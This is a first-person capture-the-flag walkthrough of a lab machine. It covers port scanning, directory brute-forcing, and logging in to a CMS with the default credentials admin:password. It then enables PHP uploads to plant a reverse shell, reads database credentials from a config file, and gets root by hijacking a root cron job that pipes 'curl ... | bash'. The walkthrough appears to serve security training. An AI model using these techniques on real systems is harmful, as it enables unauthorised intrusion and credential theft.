Hello everyone, this is my very first write-up that I want to offer to you.
before this, i hadn't done any write-up.
without wasting any time let's start!!!!
Start the machine by clicking on “Start machine” and wait a couple minutes for the automatically generated IP to appear on screen.
Nmap:-
sudo nmap -sC -sV -Pn -A 10.10.64.91
During nmap scan I found that there is only one open port which is port 85.
oky, let's see what is on port 85
i insected the page source but didn't find anything there.
GOBUSTER:-
so now Lets run gobuster on port 85 and see what we will find
gobuster dir -u http://10.10.64.91:85 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt x php,txt,html -t 50
Here we found a directory named"app"
When i visited /app there is a button "Jump" and when i clicked on it, it redirected me to /app/castle .
and in /app/castle there is a cms running and at the end there is a log in button and when i clicked it redirected me to /app/castle/index.php/login
HYDRA:-
Here i thought of using hydra for brute-forcing but first i tried with default credentials, first i tried admin:admin but didn't work but then i tried admin:password and boom!!! it worked.
After login, it gave me accessed to the Dashboard.
In this i'm logged in as admin,so i can make any changes whatever i want.
i enumerated and found a exploit for this
https://vulners.com/hackerone/H1:768322
so let's try this exploit and see what will happen.
according to this exploit we have to login as admin (and we are already logged in as admin).
after this we will have to allow allow the .php extension, so that we can upload our php reverse shell into this.
let's do it:-
on the right side there is a menu and from there go to system & setting and from there there is a option allow files types under files.
in this option, add .php and click on save button.
now lets go to Files menu and from there go to file manager.
now in your own machine create a php reverse shell file with .php extension and upload to it.
once the file is uploaded you will see a green line under the file (this means the file has been uploaded successfully).
after all this click on the (X) exit button and a popup will open containing the url of uploaded file.
Like this:)
after starting listener click on the url and you will get the rev shell.
after getting reverse shell, first of all i checked configuration files and according to our expectation we found credentials of toad user in (/var/www/html/app/castle/application/config/database.php)
oky now let's move to toad user using su toad
and after this i downloaded linpeas.sh into the /tmp directory and run it ./linpeas.sh and found something interested in env variable( you can directly see environment variables using env command).
here in Pwd_token i found a base64 encoded string.
Let's decode this using cyberchef
but still i can;t read the flag because it is owned by root user.
so let's move to root user:--
again i run linpeas and didn't find anything useful. after it i downloaded pspy64 and run it into the machine and found that there is a process running at every minute (curl mkingdom.thm:85/app/castle/application/counter.sh | bash >> /var/log/up.lo ) and it is running as root.
let's exploit this:-
first i checked /etc/hosts file and mkingdom.thm is set to 127.0.1.1
and this service is running on port 85 (found in linpeas).
now i created a full path of this process on my own machine and created a counter.sh file and pasted this command into this file.
and hurray!!! you are root now......
but still you cant cat the flag, so you have to use this command for flag (tac /root.txt )
thanks for reading!!!!